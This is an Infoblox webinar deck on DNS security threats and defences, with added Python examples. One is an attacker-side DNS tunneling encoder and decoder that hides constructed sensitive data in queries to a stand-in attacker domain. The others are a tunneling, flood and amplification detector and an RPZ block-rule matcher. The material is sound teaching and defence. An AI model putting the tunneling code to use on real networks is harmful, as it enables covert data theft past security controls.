Domain Name System (DNS): Network Security Asset or Achilles Heel?
Seema Kathuria, Sr. Product Marketing Manager, Infoblox
February 19, 2015
© 2015 Infoblox Inc. All Rights Reserved.

Agenda
• What is DNS and How Does It Work?
• Threat Landscape Trends
• Common Attack Vectors
  - Anatomy of an attack: DNS Hijacking
  - Anatomy of an attack: Reflection Attack
  - Anatomy of an attack: Data Exfiltration via DNS Tunneling
• How to Protect Yourself?
• Q&A

What is the Domain Name System (DNS)?
• The address book of the Internet
• Translates a name such as "google.com" into an IP address (188.8.131.52 in the slide's example)
• Designed in 1983 by Paul Mockapetris at USC's Information Sciences Institute (RFC 882 and RFC 883)
• Without DNS, Internet communications would stop: a DNS outage means network and business downtime

How Does DNS Work?
The slide walks through a client resolving www.google.com via its ISP's recursive DNS server:
1. Client: "I need directions to www.google.com." The query goes to the ISP DNS server (18.104.22.168 in the slide).
2. Cache hit: "That's in my cache, it maps to 184.108.40.206." The ISP server answers immediately.
3. Cache miss: "That domain is not in my server, I will ask another DNS server." The ISP server queries a root DNS server (220.127.116.11 in the slide). In practice the root does not hold the answer itself: it returns a referral to the .com servers, which refer to google.com's authoritative servers, and the recursive server follows that chain.
4. ISP DNS server: "Great, I'll put that in my cache in case I get another request." The answer is cached for the lifetime of its TTL.
5. Client: "Great, now I know how to get to www.google.com."

For Bad Guys, DNS Is a Great Target
• DNS is the cornerstone of the Internet, used by every business and government
• DNS as a protocol is easy to exploit: it runs mostly over unauthenticated UDP, so source addresses can be spoofed and responses forged
• Traditional protection is ineffective against evolving threats
• DNS outage = business downtime

Defense-in-Depth and the DNS Security Gap
• Firewalls and IDS/IPS devices don't effectively address DNS security threats; port 53 has to stay open, so DNS traffic passes straight through them
• The proliferation of BYOD devices and mobile users means threats may already be inside the firewall
• DNS technology is ideal for defending against threats and disrupting APT/malware communications from infected devices, since most malware call-homes begin with a DNS lookup
• Traditional security products generally don't focus on DNS
• A DNS security layer is needed to fill the gap
The DNS Security Challenges
1. Securing the DNS platform itself
2. Defending against DNS attacks, including data exfiltration via DNS tunneling
3. Preventing malware from using DNS to communicate with malicious domains

DNS Attack Vectors

Anatomy of an Attack: DNS Hijacking (Syrian Electronic Army)
The slide shows this case as a diagram; only the title survives here. It refers to the 2013 incidents in which the group altered the DNS records of major news and social-media sites at their registrar, redirecting visitors to attacker-controlled servers without touching the sites themselves.

Anatomy of an Attack: Distributed Reflection DoS (DrDoS)
How the attack works:
• Combines reflection and amplification
• Uses third-party open resolvers on the Internet as unwitting accomplices
• The attacker sends queries whose source address is spoofed to the victim's address to the open recursive servers
• The queries are specially crafted to produce a very large response (for example, ANY queries with a large EDNS0 buffer), so each small query yields a reply many times its size
• The replies are delivered to the spoofed address, causing a DDoS on the target victim's server

Anatomy of an Attack: Data Exfiltration via DNS Tunneling
1. A file containing sensitive information is converted to text, broken into chunks, and exfiltrated as DNS queries for names under an attacker-controlled domain
2. On the attacker's side the exfiltrated chunks are put back together and decrypted to recover the valuable information
3. Uses spoofed addresses

The Rising Tide of DNS Threats: Are You Prepared?
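The two tunneling steps above, carried out in code as an added example (this is not code from the deck or from Infoblox; the domain updates.example.net, the chunk size and the sample file contents are all constructed for illustration, and the slide's encryption step is left out so that only the encoding and reassembly are shown). Each chunk becomes one query name of the form s<seq>-<total>.<base32 payload>.updates.example.net, and the receiving side reassembles the chunks in any order:

```python
"""Added example: chunking a file into DNS query names (exfiltration) and
reassembling it on the attacker's authoritative server.  Domain, chunk size and
SECRET are constructed for this illustration; no encryption is applied."""
import base64

EXFIL_DOMAIN = "updates.example.net"   # assumed attacker-controlled zone (constructed)
MAX_LABEL = 63                          # RFC 1035 label length limit
MAX_NAME = 253                          # practical limit for a complete name

# Constructed sample "sensitive file".
SECRET = b"Constructed sample: card 4111-1111-1111-1111 exp 12/26; ssn 000-00-0000\n" * 2


def encode_chunks(data: bytes, chunk_bytes: int = 30):
    """Slide step 1: text-encode, chunk, and wrap each chunk in a query name
    s<seq>-<total>.<payload>.<EXFIL_DOMAIN>.  Base32 is used because DNS names
    are case-insensitive and resolvers may rewrite case; a 30-byte chunk encodes
    to 48 characters, which fits inside a single 63-byte label."""
    total = -(-len(data) // chunk_bytes)            # ceiling division
    names = []
    for seq in range(total):
        chunk = data[seq * chunk_bytes:(seq + 1) * chunk_bytes]
        payload = base64.b32encode(chunk).decode().rstrip("=").lower()
        labels = [payload[i:i + MAX_LABEL] for i in range(0, len(payload), MAX_LABEL)]
        name = ".".join([f"s{seq}-{total}", *labels, EXFIL_DOMAIN])
        if len(name) > MAX_NAME or any(len(l) > MAX_LABEL for l in name.split(".")):
            raise ValueError("chunk too large for one query name")
        names.append(name)
    return names


def decode_chunks(names):
    """Slide step 2, on the attacker's authoritative server: pick our names out of
    the query stream (any order, duplicates and unrelated queries tolerated) and
    reassemble.  Returns (data, complete)."""
    pieces, total = {}, None
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith("." + EXFIL_DOMAIN):
            continue                                   # not one of ours
        labels = name[:-len(EXFIL_DOMAIN) - 1].split(".")
        seq, total = (int(x) for x in labels[0][1:].split("-"))
        payload = "".join(labels[1:]).upper()
        pieces[seq] = base64.b32decode(payload + "=" * (-len(payload) % 8))
    if total is None or len(pieces) != total:
        return b"".join(pieces[i] for i in sorted(pieces)), False
    return b"".join(pieces[i] for i in range(total)), True


if __name__ == "__main__":
    queries = encode_chunks(SECRET)
    for q in queries:
        print(q)
    data, complete = decode_chunks(queries[::-1] + ["www.example.com"])
    print("reassembled:", complete, data == SECRET)
```

Every query name is well within the label and name limits, which is exactly why this traffic passes resolvers unnoticed: nothing about it is malformed. The only observable signals are many distinct, long, random-looking subdomains under one domain, which is what the detection example later on this page keys on.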
Top DNS Attacks
• TCP/UDP/ICMP floods: flood the victim's network with large amounts of traffic
• DNS amplification: use the amplification in DNS replies (small query, large response) to flood the victim
• DNS reflection / DrDoS: use third-party DNS servers to propagate a DDoS attack against the spoofed source address
• DNS cache poisoning: corrupt a DNS cache with a rogue address so clients are sent to the attacker's host
• Protocol anomalies: malformed DNS packets that cause the server to crash
• Fragmentation: traffic with lots of small, out-of-order fragments
• DNS tunneling: tunnel another protocol, or raw data, through DNS for data exfiltration
• DNS-based exploits: exploit vulnerabilities in the DNS server software
• DNS hijacking: subvert resolution of DNS queries to point at a rogue DNS server
• Reconnaissance: probe to get information on the network environment before launching an attack
• NXDOMAIN: flood the DNS server with requests for non-existent domains, filling its cache with negative answers and consuming its recursion capacity
• Phantom domain: force the DNS server to resolve many domains whose authoritative servers never respond, so the resolver's outstanding-query slots fill up while it waits

APT/Malware Examples: CryptoLocker "Ransomware" and GameOver Zeus
CryptoLocker:
• Targets Windows-based computers
• Arrives as an attachment in a seemingly legitimate email
• Upon infection, encrypts files on the local hard drive and on mapped network drives
• Ransom: 72 hours to pay US$300
• If not paid, the encryption key is deleted and the data is irretrievable
• Once the executable has started, the only way to stop it is to block its outbound connection to the server that supplies the encryption key; the malware locates that server by DNS, which is where a DNS-layer control can intervene
GameOver Zeus:
• 500,000 to 1M infections worldwide
• Hundreds of millions of dollars stolen
• Highly sophisticated and hard to track
• Uses P2P communication to control the infected devices (the botnet)
• Upon infection, monitors the machine for finance-related information
• Takes control of private online transactions and diverts funds to criminal accounts
• Responsible for distributing CryptoLocker; infected systems can also be used for DDoS attacks

Security Breaches Using APTs/Malware, 2014
[Timeline figure covering Q1 to Q4 2014; the individual breaches were shown graphically and are not reproduced here.]
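Three of the attacks in the list above leave distinct fingerprints in a resolver's own logs, and a deck that asks "would you know if an attack was happening?" deserves a concrete answer. The following is an added example, not code from the deck or from any Infoblox product: simple detectors for an NXDOMAIN flood, DNS tunneling and reflection/amplification abuse, run over a constructed log. The log format (ts,client,qname,qtype,rcode,query_bytes,response_bytes), every address and name in it, and the thresholds are all invented for this illustration; real deployments tune the thresholds against a baseline.

```python
"""Added example: three detectors over a constructed resolver query log.
Log format, addresses, names and thresholds are all invented for illustration."""
import math
from collections import Counter, defaultdict

# Constructed log: ts,client,qname,qtype,rcode,query_bytes,response_bytes
LOG = """\
1,192.0.2.10,www.example.com,A,NOERROR,45,61
2,192.0.2.10,mail.example.com,MX,NOERROR,46,120
3,198.51.100.7,isc.example.org,ANY,NOERROR,52,3220
4,198.51.100.7,isc.example.org,ANY,NOERROR,52,3220
5,198.51.100.7,isc.example.org,ANY,NOERROR,52,3220
6,203.0.113.5,s0-3.krugq2lomrsw4idvonsxe.updates.example.net,A,NOERROR,78,94
7,203.0.113.5,s1-3.l5zgc43lmv2ccidxnbsw4id.updates.example.net,A,NOERROR,78,94
8,203.0.113.5,s2-3.xvtyitnm2qhvd7wrxdm3tqzdg.updates.example.net,A,NOERROR,78,94
9,192.0.2.99,qz8k1.example.com,A,NXDOMAIN,48,48
10,192.0.2.99,m3v7p.example.com,A,NXDOMAIN,48,48
11,192.0.2.99,ab12c.example.com,A,NXDOMAIN,48,48
12,192.0.2.99,tt9xx.example.com,A,NXDOMAIN,48,48
13,192.0.2.99,www.example.com,A,NOERROR,45,61
"""


def parse(log):
    rows = []
    for line in log.splitlines():
        ts, client, qname, qtype, rcode, qb, rb = line.split(",")
        rows.append({"ts": int(ts), "client": client, "qname": qname.lower(),
                     "qtype": qtype, "rcode": rcode, "qbytes": int(qb), "rbytes": int(rb)})
    return rows


def entropy(s):
    """Shannon entropy in bits per character; random-looking labels score high."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_domain(qname):
    # Crude: assumes a one-label public suffix. Use a public-suffix list in practice.
    return ".".join(qname.split(".")[-2:])


def nxdomain_floods(rows, min_queries=4, min_ratio=0.75):
    """NXDOMAIN attack: clients whose answers are mostly NXDOMAIN."""
    per = defaultdict(lambda: [0, 0])
    for r in rows:
        per[r["client"]][0] += 1
        per[r["client"]][1] += r["rcode"] == "NXDOMAIN"
    return {c: nx / n for c, (n, nx) in per.items() if n >= min_queries and nx / n >= min_ratio}


def tunneling_suspects(rows, min_sub_len=20, min_entropy=3.5, min_unique=3):
    """DNS tunneling: many distinct, long, high-entropy subdomains under one domain."""
    subs = defaultdict(set)
    for r in rows:
        dom = registered_domain(r["qname"])
        sub = r["qname"][:-len(dom) - 1].replace(".", "") if r["qname"] != dom else ""
        if len(sub) >= min_sub_len and entropy(sub) >= min_entropy:
            subs[dom].add(sub)
    return {d: len(s) for d, s in subs.items() if len(s) >= min_unique}


def amplification_abuse(rows, min_ratio=10.0, min_queries=3):
    """Reflection/amplification: ANY queries, or responses >= min_ratio x the query size.
    The 'client' here is the spoofed source, i.e. the victim being reflected onto."""
    ratios = defaultdict(list)
    for r in rows:
        if r["qtype"] == "ANY" or r["rbytes"] >= min_ratio * r["qbytes"]:
            ratios[r["client"]].append(r["rbytes"] / r["qbytes"])
    return {c: round(max(v), 1) for c, v in ratios.items() if len(v) >= min_queries}


def run(log=LOG):
    rows = parse(log)
    return {"nxdomain": nxdomain_floods(rows),
            "tunneling": tunneling_suspects(rows),
            "amplification": amplification_abuse(rows)}


if __name__ == "__main__":
    for kind, hits in run().items():
        print(kind, hits)
```

Two caveats a practitioner should keep in mind. For the reflection case the flagged "client" is the victim, not the attacker, so the response is to stop answering (refuse ANY, rate-limit responses, close the resolver to outside addresses) rather than to block that address. For the tunneling heuristic, CDNs and some anti-spam services also generate long random-looking labels, so a hit is a lead to investigate against the RPZ and threat feeds, not a verdict on its own.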
Protection Best Practices

Help Is On The Way!
• DNSSEC
• Dedicated (hardened) appliances
• Response Policy Zones (RPZ)
• Advanced DNS Protection
• Monitoring
• Collaboration between teams

Get the Teams Talking: Questions to Ask
• Who in your organization is responsible for DNS security?
• What methods, procedures and tools do you have in place to detect and mitigate DNS attacks?
• Would you know if an attack was happening? Would you know how to stop it?
Teams that need to be in the conversation: IT Ops, IT Apps, Security, Network.

Hardened DNS Appliances
Conventional server approach:
- Many open ports, each of them subject to attack
- Users have OS-level account privileges on the server
- Requires time-consuming manual updates
Hardened appliance approach:
• Limited port access: dedicated hardware with no unnecessary logical or physical ports
• No OS-level user accounts, only administrative accounts
• Update service: immediate updates in response to new security threats
• Secure access: HTTPS-based device management, with no SSH or root-shell access
• Encrypted device-to-device communication

Advanced DNS Protection
[Diagram: Advanced DNS Protection appliances on the external and internal DNS tiers receive automatic updates from a threat-intelligence server, pass legitimate traffic, and send attack data to a reporting server that reports on attack types and severity.]

Response Policy Zones (RPZ): Blocking Responses from Malicious Domains
1. An infected device is brought into the office; the malware spreads to other devices on the network and tries to call home.
2. The malware makes a DNS query to find "home" (the botnet / C&C server).
3. The DNS server with RPZ capability checks the query name and the answer against the RPZ, which is regularly updated with malicious-domain data from reputational feeds (IPs, domains, etc. of bad servers), and blocks the connection to the malicious domain.
4. The blocked communication attempt is sent to syslog. Because the query to the malicious domain is logged, the security team can identify the requesting endpoint and attempt remediation.

Take the DNS Security Risk Assessment
1. Analyzes your organization's DNS setup to assess its exposure to DNS threats
2. Provides a DNS Security Risk Score and analysis based on the answers given
3. www.infoblox.com/dnssecurityscore
Higher score = higher DNS security risk!

Try the DNS Firewall Virtual Evaluation: Use DNS to Find Malware/APT Lurking in Your Network
• Two options: port span and standalone
• No hardware (100% virtual)
• Non-disruptive to the production network
• 60-day trial
• See malware/APT activity with reports
• www.infoblox.com/catchmalware

Call to Action
• DNS security vulnerabilities pose a significant threat
• Raise awareness of DNS and DNS security vulnerabilities in your organization
• There are many resources available to help
• Seek help if needed to protect DNS
• Talk to Infoblox

Infoblox Overview
• Founded in 1999
• Headquartered in Santa Clara, CA, with global operations in 25 countries
• Leader in technology for network control
• Market leadership: DDI market leader (Gartner); 50% DDI market share (IDC)
• 7,000+ customers; 74,000+ systems shipped to 100 countries
• 45 patents, 27 pending
• IPO April 2012: NYSE BLOX
[Chart: total revenue in $MM by fiscal year ending July 31, FY2009 to FY2014; values not reproduced.]
IT Analyst Validation
• Gartner: "usage of a commercial DDI solution can reduce (network) OPEX by 50% or more."
• IDC: Infoblox is the only major DDI vendor to gain market share over the past three years.
• Gartner: "Infoblox is the DDI market leader in terms of mainstream brand awareness."

Worldwide DDI Market Share, 2013
[Chart not reproduced.]
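Returning to the Response Policy Zones slide: the deck describes what the RPZ-capable server does but not how a policy zone is expressed or how a match is decided. The following is an added example, not code from the deck or from any DNS product. It is a minimal re-implementation of RPZ trigger and action semantics as documented for BIND (QNAME triggers with wildcards, and rpz-ip triggers on the addresses in the answer, with the standard CNAME targets ".", "*.", "rpz-drop." and "rpz-passthru."), evaluated against a constructed policy zone in which every name and address is invented. NSDNAME, NSIP and IPv6 rpz-ip triggers are out of scope.

```python
"""Added example: RPZ trigger/action matching over a constructed policy zone.
Semantics follow the BIND RPZ documentation; this is not BIND's or any vendor's
code.  Every name and address below is invented for illustration."""
import ipaddress

RPZ_ZONE = """\
$TTL 300                                  ; directives are skipped by the parser
evil-c2.example          CNAME .           ; return NXDOMAIN
*.evil-c2.example        CNAME .           ; ...and for every subdomain of it
tracker.example          CNAME *.          ; return NODATA (empty answer)
flood.example            CNAME rpz-drop.   ; drop the query silently
ok.flood.example         CNAME rpz-passthru. ; exception: answer normally
ads.example              CNAME sinkhole.corp.example. ; walled garden
phish.example       600  IN A 192.0.2.250  ; local data: answer with this address
32.5.113.0.203.rpz-ip    CNAME .           ; any answer containing 203.0.113.5
24.0.113.0.203.rpz-ip    CNAME rpz-drop.   ; any answer inside 203.0.113.0/24
"""

SPECIAL_TARGETS = {".": "NXDOMAIN", "*.": "NODATA", "rpz-drop.": "DROP",
                   "rpz-passthru.": "PASSTHRU", "rpz-tcp-only.": "TCP-ONLY"}


def parse_rpz(text):
    """Parse 'owner [ttl] [class] type rdata' lines into {owner: (type, rdata)}."""
    rules = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()        # drop comments
        if not line or line.startswith("$"):
            continue
        toks = line.split()
        i = next(k for k, t in enumerate(toks) if t.upper() in ("CNAME", "A", "AAAA"))
        rules[toks[0].lower().rstrip(".")] = (toks[i].upper(), " ".join(toks[i + 1:]))
    return rules


def action_for(rtype, rdata):
    """Map a policy record to the action the resolver takes."""
    if rtype != "CNAME":
        return ("LOCAL-DATA", rdata)
    return (SPECIAL_TARGETS.get(rdata.lower(), "CNAME"), rdata)


def qname_match(rules, qname):
    """QNAME trigger: exact owner first, then the most specific covering wildcard."""
    q = qname.lower().rstrip(".")
    if q in rules:
        return rules[q]
    labels = q.split(".")
    for i in range(1, len(labels)):
        wild = "*." + ".".join(labels[i:])
        if wild in rules:
            return rules[wild]
    return None


def ip_match(rules, answer_ips):
    """rpz-ip trigger: owner 'prefixlen.b4.b3.b2.b1.rpz-ip' encodes b1.b2.b3.b4/prefixlen
    (octets reversed).  The longest matching prefix wins."""
    best = None
    for owner, rec in rules.items():
        if not owner.endswith(".rpz-ip"):
            continue
        parts = owner[:-len(".rpz-ip")].split(".")
        if len(parts) != 5:
            continue                                  # IPv6 encoding not handled here
        plen, b4, b3, b2, b1 = parts
        net = ipaddress.ip_network(f"{b1}.{b2}.{b3}.{b4}/{plen}", strict=False)
        if any(ipaddress.ip_address(a) in net for a in answer_ips):
            if best is None or net.prefixlen > best[0]:
                best = (net.prefixlen, rec)
    return best[1] if best else None


def evaluate(rules, qname, answer_ips=()):
    """Resolver decision: QNAME triggers are checked on the query first; only if none
    fires are rpz-ip triggers checked against the addresses in the would-be answer,
    so a PASSTHRU on the name also exempts the answer from IP-based policy."""
    rec = qname_match(rules, qname) or ip_match(rules, answer_ips)
    return action_for(*rec) if rec else ("ALLOW", None)


if __name__ == "__main__":
    rules = parse_rpz(RPZ_ZONE)
    for q, ips in [("www.evil-c2.example", ()), ("ok.flood.example", ("203.0.113.5",)),
                   ("cdn.example", ("203.0.113.5",)), ("www.example", ("198.51.100.1",))]:
        print(q, ips, "->", evaluate(rules, q, ips))
```

The two actions worth thinking about before deploying are DROP and PASSTHRU. Dropping a query leaves the infected client retrying with no feedback, which is sometimes what you want for a flood but hides the event from the client's owner; an NXDOMAIN or walled-garden CNAME is usually the better choice for call-home blocking, since the slide's step 4 (log the hit, find the endpoint) depends on the query being answered and recorded. PASSTHRU entries are the escape hatch for false positives in a feed, and they should be reviewed as carefully as the block entries.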